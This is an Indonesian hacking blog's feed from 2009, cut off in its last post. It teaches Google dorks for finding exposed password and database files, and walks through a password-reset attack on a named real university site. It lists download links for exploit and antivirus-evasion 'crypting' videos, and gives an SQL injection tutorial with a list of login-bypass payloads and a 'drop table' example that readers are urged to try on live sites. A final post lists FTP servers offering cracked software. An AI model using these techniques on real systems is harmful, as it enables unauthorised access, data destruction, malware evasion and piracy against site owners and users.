<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-4385849380439813980</id><updated>2011-07-29T01:07:06.179-07:00</updated><title type='text'>bh4nned system™</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://bh4nd.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4385849380439813980/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://bh4nd.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>bh4nned®</name><uri>http://www.blogger.com/profile/02844060611053422414</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>8</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-4385849380439813980.post-785842796765095908</id><published>2009-08-14T04:23:00.000-07:00</published><updated>2009-08-14T04:24:06.930-07:00</updated><title type='text'>Google dork sebagai senjata hacking</title><content type='html'>Banyak pencarian yang kita inginkan pada search engines tidak seperti yang diharapkan, mengapa? karena keyword yang anda masukan kurang sesuai dengan keyword-keyword yang tersimpan di mesin search engines.&lt;br /&gt;&lt;br /&gt;Sehingga untuk mempermudahnya Google menyediakan fasilitas-fasilitas (dork), untuk mempermudahkan suatu pencarian, bahkan kita juga dapat melakukan hacking (melihat password) account orang lain yang terindex oleh google.&lt;br /&gt;&lt;br /&gt;Pengenalan tentang google dorks :&lt;br /&gt;Type-type dalam penggunaannya ada beberapa macam diantaranya:&lt;br /&gt;&lt;br /&gt;intitle&lt;br /&gt;allintitle&lt;br /&gt;&lt;br /&gt;(Mencari judul/title pada suatu web)&lt;br /&gt;&lt;br /&gt;inurl&lt;br /&gt;allinurl&lt;br /&gt;&lt;br /&gt;(Mencari suatu string yang terdapat pada url)&lt;br /&gt;&lt;br /&gt;filetype&lt;br /&gt;&lt;br /&gt;(Mencari suatu file secara lebih spesifik)&lt;br /&gt;(www.google.c.id/help/faq_filetypes.html)&lt;br /&gt;&lt;br /&gt;allintext&lt;br /&gt;&lt;br /&gt;(Mencari suatu nilai string dalam suatu web)&lt;br /&gt;&lt;br /&gt;site&lt;br /&gt;&lt;br /&gt;(Mencari pada web tertentu)&lt;br /&gt;&lt;br /&gt;link&lt;br /&gt;&lt;br /&gt;(Mencari web2 yang mempunyai link pada web yang di pilih)&lt;br /&gt;&lt;br /&gt;contoh dalam pengguunaannya:&lt;br /&gt;Apabila kita ingin mencair sebuah lagu dari aveng*d maka kita ketikan sja di google seperti ini&lt;br /&gt;intitle:"index of/avenged"&lt;br /&gt;dan apa hasilnya, akan kelihatan semua kumpulan lagu2 tsb, dan dengan mudah untuk kita mendownloadnya.&lt;br /&gt;Pengertian diatas, mksdnya biasanya dalam sebuah databse file web terdapat kata ( index of ) maka kita gunaka fungsi intitle untuk mencari sebuah title yang berkaitan dengan kata ( index of ), llu ketikan kata aveng*d agar google mencari database file tentg kata-kata aveng*d&lt;br /&gt;&lt;br /&gt;Apabila kita ingin mencair sebuah skripsi maka kita ketikan sja di google seperti ini&lt;br /&gt;intitle:"index of" "skripsi" site:.ac.id&lt;br /&gt;mksudnya site:ac.id itu biasanya url untuk kampus berakhiran .ac.id&lt;br /&gt;&lt;br /&gt;dan ini contoh2 lain dalam penggunaan google dork&lt;br /&gt;inurl:"guest | book" "html allowed"&lt;br /&gt;inurl:password.log&lt;br /&gt;intitle:"index of" password.txt site:my&lt;br /&gt;intitle:"index of" admin.mdb&lt;br /&gt;intitle:"index of" member.mdb&lt;br /&gt;intitle:"phpmyadmin" "running on localhost"&lt;br /&gt;intitle:"index of" "data base" site:id&lt;br /&gt;inurl:database.inc site:id&lt;br /&gt;inurl:connector.txt site:id&lt;br /&gt;site:id filetype:.doc&lt;br /&gt;&lt;br /&gt;sehingga kita bisa menggunakan google ini untk senjata hacking kita:&lt;br /&gt;misalkan kita ingin mencoba untuk menembus pada web dari j**mla dengan menggunakan token (').&lt;br /&gt;biasanya url ketika memasukan token tsb adlah&lt;br /&gt;*******.com/index.php?option=com_user&amp;view=reset&amp;layout=confirm&lt;br /&gt;di url tsb terdapat tulsan option=com_user&lt;br /&gt;mka dgn sedikit logika, kita coba menggunakan type ( inurl ) u/ mencari url yg berkaitan dengan kata option=com_user&lt;br /&gt;&lt;br /&gt;ketikan di google &gt;&gt;&gt;&gt;&gt; inurl:"option=com_user"&lt;br /&gt;dan akan terlihat hasilnya, kita ambil contoh pada web indonesia saja,&lt;br /&gt;&lt;br /&gt;http://www.lbifib.ui.ac.id/index.php?option=com_user&amp;view=login&lt;br /&gt;&lt;br /&gt;lalu hapus pada url (/index.php?option=com_user&amp;view=login) dan ganti url tersebut menjadi&lt;br /&gt;&lt;br /&gt;http://www.lbifib.ui.ac.id/index.php?option=com_user&amp;view=reset&amp;layout=confirm&lt;br /&gt;&lt;br /&gt;lalu ketikan token '&lt;br /&gt;dan apa hasilnya, password sudah bisa kita reset ulang,,,,&lt;br /&gt;&lt;br /&gt;sekarang tinggal bagaimana kita meng-applikasikan kata tersebut agar bisa mencari celah pada suatu URL website.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4385849380439813980-785842796765095908?l=bh4nd.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bh4nd.blogspot.com/feeds/785842796765095908/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://bh4nd.blogspot.com/2009/08/google-dork-sebagai-senjata-hacking.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4385849380439813980/posts/default/785842796765095908'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4385849380439813980/posts/default/785842796765095908'/><link rel='alternate' type='text/html' href='http://bh4nd.blogspot.com/2009/08/google-dork-sebagai-senjata-hacking.html' title='Google dork sebagai senjata hacking'/><author><name>bh4nned®</name><uri>http://www.blogger.com/profile/02844060611053422414</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4385849380439813980.post-7675167033267225498</id><published>2009-08-14T02:56:00.000-07:00</published><updated>2009-08-14T02:57:07.541-07:00</updated><title type='text'>TUTORIAL HACKING</title><content type='html'>Tutorial Hacking&lt;br /&gt;&lt;br /&gt;Berikut adalah kumpulan video hacker yang bisa didownload lengkap dengan banyak tutorialnya. Langsung download aja&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. DeluxeBB 1.06 Exploit (9mb)&lt;br /&gt;Remote SQL Injection Exploit&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11156227/100_live585.rar&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. NetBios Live Hack (5mb)&lt;br /&gt;Shows how to use Super Scan to Hack Netbios opened on remote PC (Port 139)&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. Classified (7mb)&lt;br /&gt;Shows how site classified is Hacked.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158779/102_site585.rar&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4. NASA (2mb)&lt;br /&gt;NASA Department website Hacked.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158865/92_meh.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5. Linux Network Monitor (5mb)&lt;br /&gt;This video shows you how to set up ntop, a network monitoring program, on GNU/Linux. Ntop features a web interface that displays tons of information about bandwidth utilization, traffic patterns, etc. It even shows you what applications are using bandwidth on your network such as ftp, bittorrent, http, dns, etc.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158774/95_CBT4Free-Linux_Network_Monitor.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;6. Linux DNS Server (11mb)&lt;br /&gt;This video explains how to set up a DNS server on a GNU/Linux server. In the video I explain a little bit about how DNS works, then I install and configure BIND in a chroot jail on 2 DNS servers in a master/slave relationship. This video is specifically tailored to setting up DNS for a web server.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;7. Windows Web Server (6mb)&lt;br /&gt;This video details the installation and configuration of Apache, MySQL, and PHP on Windows. This video is made specifically or those using Windows 2000 Pro, Windows XP Home, or Windows XP Pro.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158787/98_Windows_Web_Server.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;8. Win Server 2003 IIS and DNS (4mb)&lt;br /&gt;This video shows how to install and configure IIS and DNS on Windows Server 2003 for virtual hosting. These procedures will work with all versions of Windows Server 2003 and possibly with Windows 2000 Server.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158780/99_Windows_Server_2003_IIS_and_DNS.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;9. Hacker Defender Movie (8mb)&lt;br /&gt;Shows how Brilliant Hacker defender bypasses several rootkits detectors. You can see bypassing IceSword, BlackLight, RootkitRevealer and more.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158766&lt;br /&gt;&lt;br /&gt;/90_Brilliant_Hacker_defender_presentation_movie_MSV1.rar&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;10. 0-DAY Simple SQL Injection (8mb)&lt;br /&gt;A film project about a cracker with the name zer0day. (Hacking with Linux -php)&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158799/89_simple-sql-injection.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;11. wbb (10mb)&lt;br /&gt;wbb portal hacked by XSS.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158816/82_wbb_portal.rar&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;12. Reverse Engineering (20mb)&lt;br /&gt;Reverse Engineering with LD PRELOAD&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158857/83_reverse.rar&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;13. SWF File Vulnerability&lt;br /&gt;Multiple Websites Embedded SWF File Vulnerability Demonstration&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158813/84_SWF_Vul_Demo.rar&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;14. IPB 1.3 SQL (10mb)&lt;br /&gt;Invasion Power Board 1.3 SQL Injection Exploit&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158768/86_IPB_SQL.rar&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;15. Qnix Buffer Overflows (11mb)&lt;br /&gt;Qnix Demonstrating Exploration of Simple Buffer Overflows&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158770/87_buff.rar&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;16. ASP SQL (5mb)&lt;br /&gt;Simple ASP Administrator SQL Injection (5mb)&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158795/88_asp_sql.rar&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;17. Blind MySQL (9mb)&lt;br /&gt;Demonstration of Blind MySQL Injection (bsqlbf)&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158804/77_Blind_MySQL.rar&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;18. D-Link Wireless (3mb)&lt;br /&gt;Intruders D-Link Wireless Access Point Configuration Disclosure&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158777/78_D-Link_Wireless.rar&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;19. Mysql bftools (8mb)&lt;br /&gt;Demonstration of Blind MySQL Injection (mysql_bftools)&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158798/79_mysql_bftools.rar&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;20. PHP Remote File (9mb)&lt;br /&gt;PHP Remote File Inclusion Windows Backdoor.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158805/80_PHP_Remote.rar&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;21. Cracking WEP in 10 Minutes (30mb)&lt;br /&gt;A short demo of a wireless WEP attack. This is an interesting technique, where packets are injected to the access point, making it release weak IVs. You'll think twice about WEP after this&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158904/75_see-sec-wepcrack.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;22. Tunneling Exploits via SSH (18mb)&lt;br /&gt;An intensive demo showing how SSH Tunneling techniques can be used to exploit an interal, non routable network.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158855/74_see-sec-ssh-dcom-tunneling.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;23. A classic client side attack (18mb)&lt;br /&gt;The MS06-001 vulnerability was used to execute a reverse connect shellcode. More information about this vulnerability can be found at the Microsoft site - MS06-001.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158860/76_see-sec-client-side.rar&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;24. C++ Video tutorials (29mb)&lt;br /&gt;Nice C/C++ Shockwave videos.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158892/70_C__.rar&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;25. Interview with Kevin Mitnick (12mb)&lt;br /&gt;He was on fbi's most wanted list, a nitrous Hacker but now see Kevin's Interview after being freed what he has to say about his past and future.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158829/68_kevin.rar&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;26. Unix Shell Fundamentals (40mb)&lt;br /&gt;VTC Unix Shell Fundamentals Video Tutorials. You need Quicktime player to view the videos.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11158906/69_UnixShellFund.rar&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;27. Microsoft.com Bugs&lt;br /&gt;Nice videos shows of old bug that was exploited on the site.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;28. Bitfrost Server Crypting (15mb)&lt;br /&gt;This is nice video for any one learning how to add bytes to make there server undetectable. The rar Password is Crypt.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11164849/66_Bifrost_Server_Cryp.rar&lt;br /&gt;&lt;br /&gt;38. Metasploit Flash Tutorial&lt;br /&gt;This video covers the use of Metasploit, launched from the Auditor Boot CD, to compromise an unpatched Windows XP box by using the RPC DCOM (MS03-026) vulnerability. It then sends back a VNC session to the attacker. This is just one example of the many things Metasploit can do.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11164788/48_metasploit1.swf&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;29. Using VirtualDub and a cheap webcam as a camcorder (10mb)&lt;br /&gt;I thought this might be of use to those that would like to submit something to Infonomicon TV or Hack TV but lack the cash for a proper MiniDV camcorder.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/11164832/49_cheapcamcorder.avi&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4385849380439813980-7675167033267225498?l=bh4nd.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bh4nd.blogspot.com/feeds/7675167033267225498/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://bh4nd.blogspot.com/2009/08/tutorial-hacking.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4385849380439813980/posts/default/7675167033267225498'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4385849380439813980/posts/default/7675167033267225498'/><link rel='alternate' type='text/html' href='http://bh4nd.blogspot.com/2009/08/tutorial-hacking.html' title='TUTORIAL HACKING'/><author><name>bh4nned®</name><uri>http://www.blogger.com/profile/02844060611053422414</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4385849380439813980.post-2027124104021568213</id><published>2009-08-13T00:00:00.001-07:00</published><updated>2009-08-13T00:00:37.583-07:00</updated><title type='text'>DASAR-DASAR SQL INJECTION</title><content type='html'>Sebelum membahas tentang sql injection pertama-tama saya akan menerangkan apa itu sql injection dan&lt;br /&gt;kenapa bisa terjadi.&lt;br /&gt;Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke 'query'&lt;br /&gt;dengan cara manipulasi data input ke applikasi tsb.&lt;br /&gt;Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql ,&lt;br /&gt;disini gw cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan&lt;br /&gt;beberapa sql injection pada url.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Biasa Sql Injection dilakukan pada login page pada asp seperti di :&lt;br /&gt;admin\login.asp&lt;br /&gt;login.asp&lt;br /&gt;Jadi yang akan menjadi target itu page tersebut ,&lt;br /&gt;sekarang kita mulai aja dengan dasar-dasar sql injection :d.&lt;br /&gt;Biasanya di sql statment&lt;br /&gt;select id, user_name, password from user&lt;br /&gt;maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.&lt;br /&gt;Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut :&lt;br /&gt;select id, user_name,password from user where name = 'echo' and password='password'&lt;br /&gt;Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser&lt;br /&gt;Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language"&lt;br /&gt;seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.&lt;br /&gt;Nah, ga tau kenapa karakter single quote 'breaks out'&lt;br /&gt;dari delimiter nya SQL Jadi kalau misal ada inputan&lt;br /&gt;User: echo';drop table user--&lt;br /&gt;dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya .&lt;br /&gt;oh iya '--' merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.&lt;br /&gt;Sekarang untuk lebih jelasnya kita secara langsung pada login script seperti&lt;br /&gt;input login + password. Nama field nya 'login' dan 'pass'. dan&lt;br /&gt;SQL nya di asp: var sql = select * from users where username='"+login+"' and password='"+pass"'";&lt;br /&gt;coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative)&lt;br /&gt;pasti ke drop tuh table users&lt;br /&gt;Aduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas kita langsung praktek aja&gt;&lt;br /&gt;Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau&lt;br /&gt;admin\login.asp.&lt;br /&gt;Kalau udah dapet masukin nich variable sql nya&lt;br /&gt;user:admin&lt;br /&gt;pass:' or 1=1--&lt;br /&gt;Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d&lt;br /&gt;atau :&lt;br /&gt;user:' or 1=1--&lt;br /&gt;admin:' or 1=1--&lt;br /&gt;Mas , ga bisa nich gimana ya ?&lt;br /&gt;Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisa&lt;br /&gt;buat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter&lt;br /&gt;pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :&lt;br /&gt;Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :&lt;br /&gt;http://vivtim/index.asp?id=10&lt;br /&gt;Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahan&lt;br /&gt;pada addressnya seperti memasukan : test'1=1--&lt;br /&gt;menjadi http://victim/index.asp?id=test'1=1--&lt;br /&gt;Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target&lt;br /&gt;lalu kita tamhankan hidden field pada source tersebut sebagai contoh :&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username.&lt;br /&gt;ingat script ini ditamhakna pd script yg sudah kalian download dr target .&lt;br /&gt;&lt;br /&gt;Variable ' or 1=1--&lt;br /&gt;Mungkin pada bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat penting.Lihat contoh&lt;br /&gt;pada sebuah web tertulis http://victim/index.asp?category=laptop&lt;br /&gt;Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .&lt;br /&gt;Kalau ditulis dalam script ASP maka akan menjadi :&lt;br /&gt;v_cat = request("category")&lt;br /&gt;sqlstr="SELECT * FROM product WHERE PCategory='" &amp; v_cat &amp; "'"&lt;br /&gt;set rs=conn.execute(sqlstr)&lt;br /&gt;Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi&lt;br /&gt;SELECT * FROM product WHERE PCategory='laptop'&lt;br /&gt;lalu apa hub dengan 'or 1=1---&lt;br /&gt;coba kalau kita ganti http://victim/index.asp?category=laptop menjadi&lt;br /&gt;http://victim/index.asp?category=laptop'or 1=1--&lt;br /&gt;Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya menjadi&lt;br /&gt;SELECT * FROM product WHERE PCategory='laptop' or 1=1--'&lt;br /&gt;artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkan&lt;br /&gt;Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkan&lt;br /&gt;kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda -- merupakan&lt;br /&gt;mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page&lt;br /&gt;Kita bisa masuk kedalam login page tanpa password dan user name :d.&lt;br /&gt;Kemungkinan-kemungkinan variable lainya :&lt;br /&gt;or 1=1--&lt;br /&gt;" or 1=1--&lt;br /&gt;or 1=1--&lt;br /&gt;' or 'a'='a&lt;br /&gt;" or "a"="a&lt;br /&gt;') or ('a'='a&lt;br /&gt;' or 0=0 --&lt;br /&gt;" or 0=0 --&lt;br /&gt;or 0=0 --&lt;br /&gt;' or 0=0 #&lt;br /&gt;" or 0=0 #&lt;br /&gt;or 0=0 #&lt;br /&gt;' or 'x'='x&lt;br /&gt;" or "x"="x&lt;br /&gt;') or ('x'='x&lt;br /&gt;' or 1=1--&lt;br /&gt;" or 1=1--&lt;br /&gt;or 1=1--&lt;br /&gt;' or a=a--&lt;br /&gt;" or "a"="a&lt;br /&gt;') or ('a'='a&lt;br /&gt;") or ("a"="a&lt;br /&gt;hi" or "a"="a&lt;br /&gt;hi" or 1=1 --&lt;br /&gt;hi' or 1=1 --&lt;br /&gt;hi' or 'a'='a&lt;br /&gt;hi') or ('a'='a&lt;br /&gt;hi") or ("a"="a&lt;br /&gt;&lt;br /&gt;Selain masuk kedalam page tersebut kita juga bisa memanfaatkannya untuk remote execution dengan sql Injection.&lt;br /&gt;Semoga artikel ini berguna .&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4385849380439813980-2027124104021568213?l=bh4nd.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bh4nd.blogspot.com/feeds/2027124104021568213/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://bh4nd.blogspot.com/2009/08/dasar-dasar-sql-injection_13.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4385849380439813980/posts/default/2027124104021568213'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4385849380439813980/posts/default/2027124104021568213'/><link rel='alternate' type='text/html' href='http://bh4nd.blogspot.com/2009/08/dasar-dasar-sql-injection_13.html' title='DASAR-DASAR SQL INJECTION'/><author><name>bh4nned®</name><uri>http://www.blogger.com/profile/02844060611053422414</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4385849380439813980.post-7152645949411555679</id><published>2009-07-31T04:42:00.000-07:00</published><updated>2009-07-31T05:00:19.340-07:00</updated><title type='text'>VIP Owned</title><content type='html'>&lt;span style="font-weight: bold;"&gt;10.000 Full programs + Cracks&lt;/span&gt;&lt;br /&gt;&lt;a href="ftp://ftp.freenet.de/pub/filepilot/windows/"&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;ftp://ftp.freenet.de/pub/filepilot/windows/&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Game&lt;/span&gt;&lt;br /&gt;&lt;a style="color: rgb(0, 153, 0);" href="ftp://207.71.8.54/games/"&gt;ftp://207.71.8.54:21/games/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Mixed apps dan utilities, macromedia, Ad@be, multimedia, N&lt;/span&gt;AV&lt;br /&gt;&lt;a href="ftp://159.226.119.20/pub/windows/"&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;ftp://159.226.119.20:21/pub/windows/&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;mp3's, radio&lt;/span&gt;&lt;br /&gt;&lt;a href="ftp://193.43.36.131/Radio/MP3/"&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;ftp://193.43.36.131/Radio/MP3/ &lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="ftp://193.125.152.110/pub/.1/misc...urray/assorted"&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;ftp://193.125.152.110:21/pub/.1/misc...urray/assorted&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="ftp://193.125.152.110/pub/.1/misc...urray/assorted"&gt;&lt;span style="color: rgb(0, 153, 0);"&gt; &lt;/span&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;SolarisTM 7 Intel Platform Edition speed:15kbps&lt;/span&gt;&lt;br /&gt;&lt;a href="ftp://195.34.232.146/pub/unix/Solaris/sol7x86/"&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;ftp://195.34.232.146:21/pub/unix/Solaris/sol7x86/ &lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;MS_Visual_C++_1_52c&lt;/span&gt;&lt;br /&gt;&lt;a href="ftp://212.85.106.113/"&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;ftp://212.85.106.113:21/ &lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;ANTI VIRUS&lt;/span&gt;&lt;br /&gt;&lt;a href="ftp://89.162.150.194/Software/Antivirus/"&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;ftp://89.162.150.194/Software/Antivirus/&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span 